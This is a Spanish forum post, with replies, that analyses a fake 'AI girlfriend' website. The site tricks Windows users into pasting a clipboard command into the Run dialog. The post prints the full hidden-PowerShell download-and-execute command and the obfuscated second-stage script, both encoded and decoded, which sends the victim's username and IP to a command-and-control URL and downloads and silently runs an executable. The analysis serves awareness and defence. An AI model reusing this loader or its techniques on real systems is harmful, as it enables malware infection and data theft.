Desgranando scripts maliciosos para ejecutar malware

Quiero compartir y desgranar un poco con vosotros el malware que he visto en Twitter. Me ha aparecido la siguiente publicación:

Al parecer, una “IA” para crear una nueva “AI Girlfriend”. ¿En qué consiste una “novia IA”? Pues he accedido a la web para comprobarlo. El front es:

No me he parado a ver el código HTML ni nada, no he visto si es tiene estructura de contenido o si es una simple imagen. Lo que es cierto es que el sitio está lleno de código JavaScript; y al pinchar o hacer cualquier cosa con la página salta al siguiente “mensaje de error”:

Con unas instrucciones la mar de raras para cualquiera que utilice regularmente un ordenador… Da por hecho, evidentemente, que estás en Microsoft Windows (claro está, un usuario de GNU/Linux no caería en algo tan tonto jajajaja) y te pide que presiones Win + R para abrir la ventana de ejecutar comandos de Windows, Ctrl + V para pegar lo que previamente el script de JavaScript ha copiado en tu portapapeles, y presiones ejecutar.

La vista del comando a ejecutar es tiate forse restart browser. El comando más falso que he visto nunca. Pero claro, ese comando no existe, además de estar muy mal escrito. Vemos el contenido real que se iría a ejecutar; el comando entero que tenemos en el portapapeles:

cmd /c powershell -w hidden -c "$CHROME='i'+'e'+'x'; $SOCKET='i'+'w'+'r'; 
$UPLOAD='https:/'+'/kutt.i'+'t/ReSeT'; &($CHROME) ((&($SOCKET) $UPLOAD -UseBasicParsing).Content)"
#        Initiate forse restart browser                                        

Esto es otra cosa, sí es un comando de verdad. Veamos qué hace:

cmd /c ejecuta un comando que consiste en lanza powershell -w hidden el intérprete de PowerShell (un equivalente, para que se me entienda, de Bash) en modo oculto, sin mostrar ventana visible. Tras
-c se indica el comando. A partir de aquí se indica el script de PowerShell.

$UPLOAD='i'+'e'+'x' construye la cadena "iex", que es el alias de Invoke-Expression, un cmdlet que ejecuta una cadena como código; $CHROME='i'+'w'+'r' construye la cadena "iwr", alias de Invoke-WebRequest usado para hacer solicitued HTTP. $SOCKET='https:/'+'/kutt.i'+'t/ReSeT' construye la URL http://kutt.it/ReSeT.

Finalmente, hace la llamada que viene construyendo y declarando con &($UPLOAD) ((&($CHROME) $SOCKET -UseBasicParsing).Content), es decir, descarga y extrae el contenido de la respuesta HTTP de la URL y ejecuta el código usando Invoke-Expression.

# Initiate forse restart browser es simplemente un comentario de código, con el objetivo de aparecer en el campo de texto de la ventana de ejecución y engañar a los incautos.

El código que descarga es el siguiente:

$tFCTUeCs=[System.Text.Encoding]::Unicode; $YqMACnAc=[Convert]::FromBase64String('$ b t a g   =   " # 1 R e s e t " 
 #   D o U B e C e Z Q b U e O B N c 
 $ t g d   =   " - 1 0 0 2 5 9 7 4 0 1 3 3 9 " 
 $ h d     =   " h t t p s : / / h k d k . e v e n t s / 7 t v n 4 i q s 2 7 8 d q o " 
 $ z l     =   " h t t p s : / / d e v . a z u r e . c o m / d o w n u p d t e s / 0 b e 7 9 7 3 6 - 6 c a 9 - 4 9 1 b - b e 2 1 - 0 0 1 5 9 3 e 4 8 d 8 8 / _ a p i s / g i t / r e p o s i t o r i e s / b a 0 3 a 5 b 6 - 2 2 2 1 - 4 f 0 0 - a d 1 2 - 1 1 f 9 e a a 7 a 9 b d / i t e m s ? p a t h = / r u n 4 7 . z i p & v e r s i o n D e s c r i p t o r % 5 B v e r s i o n O p t i o n s % 5 D = 0 & v e r s i o n D e s c r i p t o r % 5 B v e r s i o n T y p e % 5 D = 0 & v e r s i o n D e s c r i p t o r % 5 B v e r s i o n % 5 D = m a i n & r e s o l v e L f s = t r u e & % 2 4 f o r m a t = o c t e t S t r e a m & a p i - v e r s i o n = 5 . 0 & d o w n l o a d = t r u e " 
 $ p z     =   " Q w e q w e 1 2 3 1 2 3 " 
 
 f u n c t i o n   s t g   { 
         p a r a m   ( 
                 [ s t r i n g ] $ s , 
                 [ s t r i n g ] $ m 
         ) 
 
         t r y   { 
                 $ i p   =   ( I n v o k e - R e s t M e t h o d   - U r i   " h t t p s : / / a p i . i p i f y . o r g ? f o r m a t = j s o n " ) . i p 
         }   c a t c h   { 
                 $ i p   =   " U n k n o w n " 
         } 
 
         $ u   =   $ e n v : U S E R N A M E 
         $ t   =   ( G e t - D a t e   - F o r m a t   s ) 
         $ t x t   =   " $ b t a g ` n [ $ s ]   $ m ` n U s e r :   $ u ` n I P :   $ i p ` n T i m e :   $ t " 
 
         $ b   =   @ { 
                 c h a t _ i d   =   $ t g d 
                 t e x t         =   $ t x t 
         }   |   C o n v e r t T o - J s o n   - D e p t h   3 
 
         t r y   { 
                 I n v o k e - R e s t M e t h o d   - U r i   $ h d   ` 
                         - M e t h o d   P O S T   ` 
                         - H e a d e r s   @ {   " C o n t e n t - T y p e "   =   " a p p l i c a t i o n / j s o n "   }   ` 
                         - B o d y   $ b   |   O u t - N u l l 
         }   c a t c h   {   } 
 } 
 
 t r y   { 
         $ b f   =   " $ e n v : A P P D A T A \ N V I D I A \ U p d a t e S e r v i c e " 
         $ m a   =   3 
         $ d   =   $ f a l s e 
 
         f o r   ( $ i   =   1 ;   $ i   - l e   $ m a ;   $ i + + )   { 
                 $ r   =   - j o i n   ( ( 6 5 . . 9 0 )   +   ( 9 7 . . 1 2 2 )   +   ( 4 8 . . 5 7 )   |   G e t - R a n d o m   - C o u n t   5   |   %   { [ c h a r ] $ _ } ) 
                 $ t f   =   " $ b f \ T $ r " 
                 $ z p   =   " $ t f \ z . z i p " 
                 $ e p   =   " $ t f \ c " 
 
                 t r y   { 
                         i f   ( - n o t   ( T e s t - P a t h   $ t f ) )   { 
                                 N e w - I t e m   - I t e m T y p e   D i r e c t o r y   - P a t h   $ t f   - F o r c e   |   O u t - N u l l 
                                 N e w - I t e m   - I t e m T y p e   D i r e c t o r y   - P a t h   $ e p   - F o r c e   |   O u t - N u l l 
                         } 
 
                         $ n v   =   ( G e t - I t e m P r o p e r t y   " H K L M : \ S O F T W A R E \ M i c r o s o f t \ N E T   F r a m e w o r k   S e t u p \ N D P \ v 4 \ F u l l "   - E r r o r A c t i o n   S i l e n t l y C o n t i n u e ) . R e l e a s e 
                         i f   ( $ n v   - a n d   $ n v   - g e   3 7 8 3 8 9 )   { 
                                 A d d - T y p e   - A s s e m b l y N a m e   " S y s t e m . N e t . H t t p " 
                                 $ c l   =   [ S y s t e m . N e t . H t t p . H t t p C l i e n t ] : : n e w ( ) 
 #   c X Q q y X E H h N M K G d u F 
                                 $ c l . D e f a u l t R e q u e s t H e a d e r s . A d d ( " U s e r - A g e n t " ,   " M o z i l l a / 5 . 0 " ) 
                                 $ b s   =   $ c l . G e t B y t e A r r a y A s y n c ( $ z l ) . R e s u l t 
 #   o r S N B g s F E V K v L H r X 
                                 [ S y s t e m . I O . F i l e ] : : W r i t e A l l B y t e s ( $ z p ,   $ b s ) 
                         }   e l s e   { 
                                 $ w c   =   N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t 
                                 $ w c . H e a d e r s . A d d ( " U s e r - A g e n t " ,   " M o z i l l a / 5 . 0 " ) 
                                 $ w c . D o w n l o a d F i l e ( $ z l ,   $ z p ) 
                         } 
 
                         i f   ( T e s t - P a t h   $ z p )   { 
                                 $ d   =   $ t r u e 
                                 b r e a k 
                         } 
                 }   c a t c h   { 
                         S t a r t - S l e e p   - S e c o n d s   1 
                 } 
         } 
 
         i f   ( - n o t   $ d )   { 
                 s t g   " E R R O R "   " Z I P   d o w n l o a d   f a i l e d " 
                 e x i t 
         } 
 
         A d d - T y p e   - A s s e m b l y N a m e   S y s t e m . I O . C o m p r e s s i o n . F i l e S y s t e m 
         [ I O . C o m p r e s s i o n . Z i p F i l e ] : : E x t r a c t T o D i r e c t o r y ( $ z p ,   $ t f ) 
 
         $ s 7   =   G e t - C h i l d I t e m   - P a t h   $ t f   - R e c u r s e   - F i l t e r   " 7 z r . e x e "   |   S e l e c t - O b j e c t   - F i r s t   1 
         $ a 7   =   G e t - C h i l d I t e m   - P a t h   $ t f   - R e c u r s e   - F i l t e r   " * . 7 z "   |   S e l e c t - O b j e c t   - F i r s t   1 
 
         i f   ( - n o t   $ s 7   - o r   - n o t   $ a 7 )   { 
                 s t g   " E R R O R "   " 7 z   o r   e x t r a c t o r   n o t   f o u n d " 
                 e x i t 
         } 
 
         S t a r t - P r o c e s s   - F i l e P a t h   $ s 7 . F u l l N a m e   ` 
                 - A r g u m e n t L i s t   " x " ,   " ` " $ ( $ a 7 . F u l l N a m e ) ` " " ,   " - o $ e p " ,   " - p $ p z " ,   " - y "   ` 
                 - W i n d o w S t y l e   H i d d e n   - W a i t 
 
         $ e x   =   G e t - C h i l d I t e m   - P a t h   $ e p   - R e c u r s e   - F i l t e r   * . e x e   |   S e l e c t - O b j e c t   - F i r s t   1 
         i f   ( - n o t   $ e x )   { 
                 s t g   " E R R O R "   " N o   . e x e   f o u n d   a f t e r   e x t r a c t i o n " 
                 e x i t 
         } 
 
         S t a r t - P r o c e s s   - F i l e P a t h   $ e x . F u l l N a m e   - W i n d o w S t y l e   H i d d e n 
 
         s t g   " S U C C E S S "   " " 
 } 
 c a t c h   { 
         s t g   " E R R O R "   " U n e x p e c t e d   f a i l u r e " 
 } '); Invoke-Expression (${tFCTUeCs}.GetString(${YqMACnAc}))

El código es un script de PowerShell ofuscado, por lo que lo primero que hace es indicar cómo decodificarlo.

El tipo de codificación es Unicode como vemos en $tFCTUeCs=[System.Text.Encoding]::Unicode, la cadena codificada en Base64 está en $YqMACnAc=[Convert]::FromBase64String(...) y la orden Invoke-Expression (${tFCTUeCs}.GetString(${YqMACnAc})) decodifica la cadena Base64 a texto Unicode, después la ejecuta como código PowerShell.

Al decodificar la cadena en la terminal con:

echo $CADENA | base64 -d

Obtenemos el script malicioso de PowerShell:

$btag = "#1ReSeT"
# DoUBCeZQBVeOBNc
$tgd = "-1002597401339"
$hd = "https://hkdk.events/7tvn4iqs278dqo"
$zl = "https://dev.azure.com/downupdates/0be79736-6ca9-491b-be21-001593e48d88/_apis/git/repositories/ba03a5b6-2221-4f00-ad12-11f9eaa7a9bd/items?path=/run47.zip&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true"
$pz = "Qweqwe123123"

function stg {
    param (
        [string]$s,
        [string]$m
    )

    try {
        $ip = (Invoke-RestMethod -Uri "https://api.ipify.org?format=json").ip
    } catch {
        $ip = "Unknown"
    }

    $u = $env:USERNAME
    $t = (Get-Date -Format s)
    $txt = "$btag`n[$s] $m`nUser: $u`nIP: $ip`nTime: $t"

    $b = @{
        chat_id = $tgd
        text = $txt
    } | ConvertTo-Json -Depth 3

    try {
        Invoke-RestMethod -Uri $hd `
            -Method POST `
            -Headers @{ "Content-Type" = "application/json" } `
            -Body $b | Out-Null
    } catch {}
}

try {
    $bf = "$env:APPDATA\NVIDIA\UpdateService"
    $ma = 3
    $d = $false

    for ($i = 1; $i -le $ma; $i++) {
        $r = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 5 | % {[char]$_})
        $tf = "$bf\T$r"
        $zp = "$tf\z.zip"
        $ep = "$tf\c"

        try {
            if (-not (Test-Path $tf)) {
                New-Item -ItemType Directory -Path $tf -Force | Out-Null
                New-Item -ItemType Directory -Path $ep -Force | Out-Null
            }

            $nv = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -ErrorAction SilentlyContinue).Release
            if ($nv -and $nv -ge 378389) {
                Add-Type -AssemblyName "System.Net.Http"
                $cl = [System.Net.Http.HttpClient]::new()
                $cl.DefaultRequestHeaders.Add("User-Agent", "Mozilla/5.0")
                $bs = $cl.GetByteArrayAsync($zl).Result
                [System.IO.File]::WriteAllBytes($zp, $bs)
            } else {
                $wc = New-Object System.Net.WebClient
                $wc.Headers.Add("User-Agent", "Mozilla/5.0")
                $wc.DownloadFile($zl, $zp)
            }

            if (Test-Path $zp) {
                $d = $true
                break
            }
        } catch {
            Start-Sleep -Seconds 1
        }
    }

    if (-not $d) {
        stg "ERROR" "ZIP download failed"
        exit
    }

    Add-Type -AssemblyName System.IO.Compression.FileSystem
    [IO.Compression.ZipFile]::ExtractToDirectory($zp, $tf)

    $s7 = Get-ChildItem -Path $tf -Recurse -Filter "7zr.exe" | Select-Object -First 1
    $a7 = Get-ChildItem -Path $tf -Recurse -Filter "*.7z" | Select-Object -First 1

    if (-not $s7 -or -not $a7) {
        stg "ERROR" "7z or extractor not found"
        exit
    }

    Start-Process -FilePath $s7.FullName `
        -ArgumentList "x", "`"$($a7.FullName)`"", "-o$ep", "-p$pz", "-y" `
        -WindowStyle Hidden -Wait

    $ex = Get-ChildItem -Path $ep -Recurse -Filter *.exe | Select-Object -First 1
    if (-not $ex) {
        stg "ERROR" "No .exe found after extraction"
        exit
    }

    Start-Process -FilePath $ex.FullName -WindowStyle Hidden

    stg "SUCCESS" ""
}
catch {
    stg "ERROR" "Unexpected failure"
}

No voy a detallar línea a línea porque sería un trabajo bastante tedioso, pero realizaré una lectura vertical. Para empezar, variables de interés:

  • $btag = "#1ReSeT" no estoy seguro de qué es, parece un identificador para rastrear la ejecución o algo.
  • $tgd = "-1002597401339" parece otro identificador, posiblemente para un chat o bot de Telegram.
  • $hd = "https://hkdk.events/7tvn4iqs278dqo" es una URL del servidor de comando y control.
  • Una URL que descarga de los servidores de Azure un archivo ZIP (run47.zip):
$zl = "https://dev.azure.com/downupdates/0be79736-6ca9-491b-be21-001593e48d88/_apis/git/repositories/ba03a5b6-2221-4f00-ad12-11f9eaa7a9bd/items?path=/run47.zip&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true"
  • $pz = "Qweqwe123123" la contraseña para el ZIP.

Después, la función stg recolecta informción del sistema, obtiene la dirección IP pública mediante una llamada a api.ipify.org, obtiene el nombre de usuario ($env:USERNAME) y la fecha y hora, contruye un mensaje con $btag y la información anterior y, finalmente, envía esta información como JSON a la URL del servidor de control mediante POST.

Después define el directorio %APPDATA%\NVIDIA\UpdateService y genera un nombre aleatorio para una subcarpeta, descarga el zip run47.zip de Azure usando e un HttpClient o WebClient, dependiendo de la versión de .NET que tenga la víctima y lo extrae en el directorio definido.

No estoy entrando en cada bucle ni control de errores, ya que lo creo irrelevante para la entrada.

Una vez extraídos, ejecuta 7zr.exe para extraer el 7z contenido en los archivos extraídos del zip; usando además la contraseña declarada en las variables. Después ejecuta un ejecutable (.exe).

Conocer el propósito del ejecutable es más difícil, habría que ejecutar técnicas de ingeniería inversa para averiguar qué hace, pero podría hacer cualquier cosa: ransomware, troyano, software espía, minero de criptomonedas…

Quizá si tenga tiempo me aventiure a montar una máquina virtual aislada con Windows para ejecutarlo y ver qué hace. O analizar el exe a ver si podemos averiguar parte del código y poder deducirlo.

8 Me gusta

Nunca deja de sorprenderme el ingenio humano jajajaja

Muy buena demostración del funcionamiento de un malware.

:joy: y lo peor, es que todo este procedimiento de scripts son para finalmente descargar el malware, que es un ejecutable exe. Es decir, ni si quiera hemos tocado la superficie del malware, sino el método de infección.

El post ha sido eliminado, pero antes de ello he podido ver que tenía casi 100k de visualizaciones. Eso son casi 100k de potenciales víctimas. Y sólo ha estado 2 horas publicado por una cuenta de 50 seguidores. Imagínate las campañas que cuenten con más recursos el potencial que tienen de infección a través de redes sociales e incautos (la mayoría).

El primer paso para protegerte ser potenciales víctimas es tener cabeza, un poquito de conocimiento de lo que se utiliza y sentido común. El segundo paso es usar Linux :muscle:

3 Me gusta